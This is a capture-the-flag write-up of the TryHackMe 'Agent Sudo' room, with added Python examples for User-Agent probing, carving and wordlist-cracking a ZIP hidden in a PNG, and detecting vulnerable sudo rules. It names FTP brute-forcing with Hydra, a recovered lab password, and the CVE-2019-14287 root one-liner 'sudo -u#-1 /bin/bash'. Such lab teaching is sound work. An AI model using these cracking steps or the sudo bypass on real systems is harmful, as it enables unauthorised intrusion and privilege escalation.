# Agent Sudo

{% embed url="<https://tryhackme.com/room/agentsudoctf>" %}

### Enumerate

Upon launching the box and entering the site, I am greeted with this:

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FgA9HVYjwEP8auquOjYF4%2Fimage.png?alt=media\&token=a75276ef-c072-489e-9748-ca895a9ce84a)

I checked whether any extra directories exist and ran an nmap scan to find entry points. No useful directories turned up, but three ports are open: FTP, SSH and HTTP.

Next, I looked into the user-agent codenames. At first I was unsure how to approach this and what the input should be; eventually I worked out that the User-Agent header has to be set to one of the agents' single-letter codenames. After trying A, B and C, I got this message with C as the User-Agent:

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FqDFVaYwfFAQXUZT0oV0c%2Fimage.png?alt=media\&token=5e195beb-832c-48ff-af5a-5c855b7fb742)
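Trying letters by hand works for three of them; the script below, an added example that is not part of the original writeup, automates the whole alphabet. It requests the page once with an ordinary User-Agent as a baseline, then once per letter A-Z, and reports every letter whose status or body differs from the baseline. The target URL is a placeholder, the fetch function is injectable so the scan can be exercised without a live box, and urllib follows redirects on its own, so a per-agent redirect to another page shows up in the diff.

```python
"""Probe which single-letter User-Agent values make the target answer
differently.  Added example for this writeup, not code from the room; the
URL is a placeholder and the baseline agent string is an assumption."""
import string
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

# fetch(url, user_agent) -> (status, body); injectable so the scan can be
# tested without a live target
Fetcher = Callable[[str, str], Tuple[int, bytes]]


def http_fetch(url: str, user_agent: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """GET url with the given User-Agent.  urllib follows 3xx redirects by
    itself, so a redirect to an agent-specific page is captured as well."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:       # 4xx/5xx still carry a body
        return err.code, err.read()


def find_special_agents(url: str,
                        candidates: Iterable[str] = string.ascii_uppercase,
                        fetch: Fetcher = http_fetch) -> Dict[str, Tuple[int, bytes]]:
    """Return {agent: (status, body)} for every candidate whose response
    differs from a baseline request made with a browser-like User-Agent."""
    baseline = fetch(url, "Mozilla/5.0 (baseline)")
    hits = {}
    for agent in candidates:
        response = fetch(url, agent)
        if response != baseline:
            hits[agent] = response
    return hits


if __name__ == "__main__":
    # placeholder target; pass the real box address on the command line
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.10/"
    for agent, (status, body) in find_special_agents(target).items():
        print(f"User-Agent: {agent} -> HTTP {status}, {len(body)} bytes")
        print(body.decode(errors="replace")[:300])
```

On a page with dynamic content the whole-body comparison will flag noise; compare the status plus a normalised body (timestamps stripped, or a hash of the visible text) instead. The same loop works for any header-keyed behaviour, not only User-Agent.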

### Hash Cracking and Brute Force

Now that I had a username, I could brute-force the FTP service with it. Hydra works perfectly and finds the password "**crystal**".

The FTP share held three files to pull down: two .png images and one .txt file. The text file read:

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F530awb0VwOIvjR6v8rp5%2Fimage.png?alt=media\&token=6253e320-722d-4e28-9897-9001cfbdce7f)

I then ran binwalk to extract embedded data from one of the .png files, which produced a directory named "**\_cutie.png.extracted**". Inside it was a password-protected zip. Cracking it takes `zip2john` to turn the archive into a John-compatible hash, then `john` to recover the password, after which the archive can be unzipped.

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FdhGg04KKnWB2hQEQzkiK%2Fimage.png?alt=media\&token=8abd0ffb-445c-496a-b0a2-f2b8ca94c16f)
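What binwalk and zip2john/john did in that step, done by hand as an added example that is not part of the original writeup: walk the PNG chunk list to find where the image really ends, carve the ZIP that starts after IEND, and try a wordlist against the archive using the standard library's ZipCrypto support. The PNG, the archive, its password and the wordlist are all constructed here, not the room's files; `zipcrypto_encrypt` and `build_sample` exist only to produce that sample, because the stdlib reads ZipCrypto archives but will not write them.

```python
"""Carve a ZIP appended after a PNG's IEND chunk and crack its password
with a wordlist.  Added example for this writeup, not the room's files: the
PNG, the archive, its password and the wordlist are constructed below, and
zipcrypto_encrypt exists only to build that sample (the stdlib can read
ZipCrypto archives but will not write them)."""
import io
import struct
import zipfile
import zlib
from typing import List, Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_SIG = b"PK\x03\x04"


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past IEND; anything
    after that is not part of the image."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4                 # length+type, payload, CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("truncated PNG: no IEND chunk")


def carve_zip(data: bytes) -> Optional[bytes]:
    """Bytes from the first ZIP local-file header after IEND, or None."""
    idx = data.find(ZIP_LOCAL_SIG, png_end_offset(data))
    return None if idx == -1 else data[idx:]


def crack_zip(zip_bytes: bytes, wordlist: List[str]) -> Optional[str]:
    """Try each candidate against the first encrypted entry.  A wrong
    password fails the 1-byte header check (RuntimeError) or, one time in
    256, the CRC check at EOF (BadZipFile); both just mean 'next word'."""
    zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    encrypted = [i for i in zf.infolist() if i.flag_bits & 0x1]
    if not encrypted:
        return None                           # nothing to crack
    for pw in wordlist:
        try:
            zf.read(encrypted[0], pwd=pw.encode())
            return pw
        except (RuntimeError, zipfile.BadZipFile):
            continue
    return None


# ---- constructed sample data (not the room's files) ----------------------
def _crc_step(crc: int, byte: int) -> int:
    # one table step of CRC-32 without zlib's pre/post inversion
    return zlib.crc32(bytes([byte]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


def zipcrypto_encrypt(password: bytes, plaintext: bytes, crc: int) -> bytes:
    """Traditional PKWARE 'ZipCrypto' cipher for a stored entry: 12-byte header
    (last byte = high CRC byte, the check byte; zeros instead of random) + data."""
    k0, k1, k2 = 0x12345678, 0x23456789, 0x34567890

    def update(b: int) -> None:
        nonlocal k0, k1, k2
        k0 = _crc_step(k0, b)
        k1 = ((k1 + (k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        k2 = _crc_step(k2, k1 >> 24)

    for b in password:
        update(b)
    out = bytearray()
    for p in bytes(11) + bytes([(crc >> 24) & 0xFF]) + plaintext:
        t = (k2 | 2) & 0xFFFF
        out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
        update(p)                             # keystream advances on plaintext
    return bytes(out)


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))


def build_sample(password: bytes, name: str, secret: bytes) -> bytes:
    """A 1x1 PNG followed by a one-entry ZIP whose stored entry has been
    rewritten in place as ZipCrypto-encrypted (flag bit 0, sizes, CD offset)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, secret)
    raw = bytearray(buf.getvalue())
    enc = zipcrypto_encrypt(password, secret, zlib.crc32(secret))
    data_off = 30 + struct.unpack_from("<H", raw, 26)[0] + struct.unpack_from("<H", raw, 28)[0]
    cd_off = raw.find(b"PK\x01\x02", data_off) + 12    # moves by the 12-byte header
    raw[6] |= 1                                         # local header: encrypted
    raw[18:22] = struct.pack("<I", len(enc))            # local header: compressed size
    raw[data_off:data_off + len(secret)] = enc
    raw[cd_off + 8] |= 1                                # central dir: encrypted
    raw[cd_off + 20:cd_off + 24] = struct.pack("<I", len(enc))
    eocd = raw.rfind(b"PK\x05\x06")
    raw[eocd + 16:eocd + 20] = struct.pack("<I", cd_off)
    png = (PNG_SIG + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
           + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b""))
    return png + bytes(raw)
```

Two things this makes visible that the tool output hides: the carve boundary is the end of the IEND chunk, not the end of the file, which is why the image still displays normally with a payload behind it; and ZipCrypto's one-byte check lets a wordlist run discard most wrong guesses without touching the data, which is also why john can test it so quickly.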

Once unzipped, the message inside contained a string that looked like a password, but it did not work as a credential, so I figured it had not been fully decoded yet.

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FmqWelCplpo1EJq2VJ6P6%2Fimage.png?alt=media\&token=4819d0fb-9f6d-4747-9eb6-d003027ab2db)

After base64-decoding it, I got this password:

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F50NAT5Ht4Zq5mTc21TGH%2Fimage.png?alt=media\&token=5436bfcc-8471-4803-8c05-34ec6168bbd6)

After all that, I ran steghide against the other image, the one binwalk had not touched. It prompted for a password as expected and extracted a text file.

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FYX33YitpXakn94rqDzyA%2Fimage.png?alt=media\&token=d1f0ad13-94c5-4dc1-9212-b0727c640ef6)

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F7ApIaFqc14wUUA0pFTpq%2Fimage.png?alt=media\&token=e9af16e4-30d4-4a7f-a0c5-48aa883d0017)

### Capture the User Flag

SSH in as the user with those credentials and read the user flag. Then pull the image back to your attacking machine with `scp james@<IP>:Alien_autospy.jpg ./` so you can view it. Look at the picture, drop it into a reverse image search, then search for a few keywords from the result plus "Fox News"; the incident the photo refers to turns up quickly.

### Privilege Escalation

Lastly, check james's privileges with `sudo -l`: james may run `/bin/bash` as any user except root, i.e. the rule is `(ALL, !root) /bin/bash`.

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2FDywQVuZGNODHLK8lZphU%2Fimage.png?alt=media\&token=c5b31067-57e3-4a08-b098-74b96265117f)

Simply searching for **(ALL, !root) /bin/bash** turns up an exploit on Exploit-DB:

CVE-2019-14287 <https://www.exploit-db.com/exploits/47502>

Reading through the exploit gives the one-liner `sudo -u#-1 /bin/bash`. The rule only forbids the user root (uid 0), but sudo versions before 1.8.28 accept the user ID -1 (or its unsigned form 4294967295), which is neither; when sudo then passes -1 to setresuid(), the kernel treats it as "leave unchanged", so the shell runs with the uid 0 that the setuid-root sudo binary already holds. That grants root, and the final flag can be retrieved.

![](https://850580359-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSqAgfe92W3tM8LBhIHHu%2Fuploads%2F7O5ccSesT2CW6G92G9I8%2Fimage.png?alt=media\&token=ecf7bea5-ae00-4128-9ee4-125c36b4de05)
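The check a defender or auditor would want here, as an added example that comes neither from the writeup nor from sudo's code base: given `sudo -l` output (or sudoers lines) it flags every rule whose runas list is ALL with root negated, reports the uid -1 command that abuses each one, and combines that with the version from `sudo --version`, since the fix shipped in sudo 1.8.28. The sample output and version string are constructed stand-ins, and the rule regex is a heuristic for the usual one-rule-per-line layout rather than a full sudoers parser.

```python
"""Flag sudo rules that grant 'everyone except root' and check whether the
installed sudo predates the CVE-2019-14287 fix.  Added example for this
writeup, not code from the room or from sudo; SAMPLE_SUDO_L and
SAMPLE_VERSION are constructed stand-ins for real `sudo -l` and
`sudo --version` output, and RULE_RE is a heuristic, not a sudoers parser."""
import re
from typing import List, NamedTuple, Optional, Tuple

# "(runas) [TAG:] command" as printed by `sudo -l`, or the tail of a
# sudoers line such as "james ALL=(ALL, !root) /bin/bash"
RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")
FIXED_IN = (1, 8, 28)          # first sudo release that rejects uid -1 / 4294967295


class Finding(NamedTuple):
    rule: str
    command: str
    bypass: str


def rule_excludes_root(runas: str) -> bool:
    """True for a runas user list like 'ALL, !root' or 'ALL, !#0': an
    allow-all with root carved out.  Only the user part (before ':')
    counts; a negated *group* is a different rule."""
    users = [u.strip() for u in runas.split(":", 1)[0].split(",")]
    return "ALL" in users and any(u in ("!root", "!#0") for u in users)


def find_root_exclusions(sudo_l_output: str) -> List[Finding]:
    """One Finding per rule that relies on excluding root, with the command
    that abuses it on an unpatched sudo (uid -1 is neither root nor rejected,
    and setresuid(-1) leaves sudo's uid 0 untouched)."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.search(line)
        if m and rule_excludes_root(m.group("runas")):
            findings.append(Finding(line.strip(), m.group("cmd"),
                                    f"sudo -u#-1 {m.group('cmd')}"))
    return findings


def parse_sudo_version(version_output: str) -> Optional[Tuple[int, int, int]]:
    """(major, minor, patch) from `sudo --version`; the 'pN' suffix of
    releases such as 1.8.21p2 does not matter for this check."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", version_output)
    return (int(m[1]), int(m[2]), int(m[3])) if m else None


def is_cve_2019_14287_exploitable(version_output: str, sudo_l_output: str) -> bool:
    """Both conditions are needed: a root-excluding rule and sudo < 1.8.28."""
    version = parse_sudo_version(version_output)
    return (version is not None and version < FIXED_IN
            and bool(find_root_exclusions(sudo_l_output)))


# constructed stand-ins, not the box's real output
SAMPLE_SUDO_L = """User james may run the following commands on target:
    (ALL, !root) /bin/bash
"""
SAMPLE_VERSION = "Sudo version 1.8.27\nSudoers policy plugin version 1.8.27\n"

if __name__ == "__main__":
    for f in find_root_exclusions(SAMPLE_SUDO_L):
        print(f"rule: {f.rule}\n  bypass on sudo < 1.8.28: {f.bypass}")
    print("exploitable:", is_cve_2019_14287_exploitable(SAMPLE_VERSION, SAMPLE_SUDO_L))
```

The remediation is not a cleverer exclusion but an upgrade to sudo 1.8.28 or later and a rewrite of `(ALL, !root)` as an explicit allow-list of the runas users actually needed. `-u#4294967295` is the unsigned spelling of the same bypass and is covered by the same version check.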
